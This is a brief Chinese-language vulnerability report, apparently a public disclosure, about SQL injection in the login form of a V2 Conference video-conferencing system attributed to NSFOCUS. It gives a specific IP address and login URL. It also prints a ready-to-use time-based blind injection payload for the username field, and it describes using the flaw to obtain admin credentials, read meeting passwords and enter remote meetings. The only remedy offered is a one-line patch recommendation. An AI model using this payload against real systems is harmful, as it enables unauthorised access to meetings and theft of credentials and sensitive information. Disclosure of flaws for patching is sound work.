綠盟視頻會議系統SQL注入

 　　通過注入能夠拿到管理賬戶密碼，然後登錄後台查看會議密碼，通過會議密碼能夠進入到遠程會議中，惡意攻擊者能夠竊取某些敏感信息。

　　http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do

　　其實是V2 Conference視頻會議系統較低版本的SQL注入，注入發生在登錄時用戶名的輸入框內，使用以下注入語句可測試：

　　1' or (select benchmark(300000,md5(user())) from users where substring(username,1,5)='admin')#

　　修復方案：

　　升級補丁